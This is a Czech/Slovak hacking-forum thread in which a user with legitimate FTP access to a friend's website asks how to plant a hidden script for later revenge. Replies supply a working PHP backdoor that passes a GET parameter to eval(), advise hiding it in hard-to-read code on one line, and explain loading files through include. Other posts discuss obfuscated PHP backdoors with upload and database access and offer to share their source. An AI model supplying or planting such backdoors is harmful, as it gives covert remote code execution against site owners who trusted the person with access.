PHP Script s chybou

HackForum

PHP Script s chybou#
cawte, mam pristup(oficialne) na jeden web, konkretne na ftp, robim kamosovi forum, slubil mi zato ze ma necha adminom, ale chcem si spravit poistku, ze keby ma zradil, porusil dohodou, tak mu na stranku hodim nejaky script, pomocou ktoreho by som sa mu potom mohol pomstit, poradite mi nieco???
(odpovědět)
mistake25 | E-mail | Website | ICQ 212-798-1296.11.2006 16:42
re: PHP Script s chybou#
Kamkoliv doprostred toho nejneprehlednejsiho scriptu hod eval() funkci, ktera bude vykonavat prikazy zadany v GET promenny (pres URL).
(odpovědět)
Emkei | E-mail | Website | PGP6.11.2006 17:09
re: PHP Script s chybou#
heh, ja velmi php neovladam, nemohol by si mi to napisat? aspon zaklad
(odpovědět)
mistake25 | E-mail | Website | ICQ 212-798-1296.11.2006 17:15
re: PHP Script s chybou#
if (isset($_GET["foo"])) {
$foo = get_magic_quotes_gpc()?
stripslashes($_GET["foo"]):
$_GET["foo"];
eval($foo);
}
(odpovědět)
Emkei | E-mail | Website | PGP6.11.2006 18:58
re: PHP Script s chybou#
Když si budeš dávat majzla na to co tam píšeš, tak můžeš vypustit 2. a 3. řádek. ( To bys měl sice vědět, ale pro doplnění: vstup do skriptu by měl bejt ve stylu index.php?foo=echo'ahoj' ). Možná lepší bude když to namatláš do jednoho řádku, to se pak hůř čte.
(odpovědět)
Člověk | E-mail | Website | ICQ 333-851-7176.11.2006 19:23
re: PHP Script s chybou#
nebo tam hos php_backdoor a pak jen muzes ovladat jeho stranky i forum jak se ti zliby, myslim zde n soomu neco takovyho kdysi bylo, mozna emkei bude vedet
(odpovědět)
Antiy | Website6.11.2006 19:24
re: PHP Script s chybou#
no akoze, to vobec nemusi byt nenapadne, totizto ten co mu robim forum vobec php neovlada, a taketo veci kontrolovat nebude
(odpovědět)
mistake25 | E-mail | Website | ICQ 212-798-1296.11.2006 19:42
re: PHP Script s chybou#
to Antiy: no aj to by mohlo byt, skusim pozret ci tu nieco take je
(odpovědět)
mistake25 | E-mail | Website | ICQ 212-798-1296.11.2006 19:43
re: PHP Script s chybou#
len este otazka, to echo mi ide, ale da sa cez to spravit aj include? ak hej ako?
(odpovědět)
mistake25 | E-mail | Website | ICQ 212-798-1296.11.2006 19:48
re: PHP Script s chybou#
ako asi, ty pako :) misto echo dej include
(odpovědět)
kve | 82.208.44.*6.11.2006 23:40
re: PHP Script s chybou#
no tak nasiel som php backdoor, daju sa s tym uploadovat subory a da sa prihlasit do databazy, takze zatial aspon takto
(odpovědět)
mistake25 | E-mail | Website | ICQ 212-798-1296.11.2006 20:05
re: PHP Script s chybou#
kde si ho nasiel? Ja som toho uz prezrel dost a nic...
(odpovědět)
pwnage | 87.197.40.*7.11.2006 17:44
re: PHP Script s chybou#
pwnage: Si nějakej udělej. Jsem si udělal lepší. :) Na netu vim jen o jednom co se da sehnat. Je od curliboie a ke stažení je protože nasral několik lidí od wz a jeden z nich ho uveřejnil. :) Docela slušnej. Zašifrovanej v php, aby nebyl tolik nápadnej... spouští se se speciální konfigurací URL, jinak hodí anglickou hlášku ve stylu: "Minimální soubor, nemazat!!" :)
(odpovědět)
.Orin. - ZASE SE NEBUDU LOGOVAT | 82.100.62.*7.11.2006 17:51
re: PHP Script s chybou#
to pwnage: no tak pozri, neviem ci ti to bude stacit, vie: uploadovat subory, mozes si prezret obash danej zlozky, a pridat prikaz do mysql databazy, ak vies meno a heslo. je tu [link]
(odpovědět)
mistake25 | E-mail | Website | ICQ 212-798-1297.11.2006 19:03
re: PHP Script s chybou#
sry, ten link nejdem aspon mne, napis mi na mail, ja ti poslem zdrojak
(odpovědět)
mistake25 | E-mail | Website | ICQ 212-798-1297.11.2006 19:16

Zpět
 
 
 

 
BBCode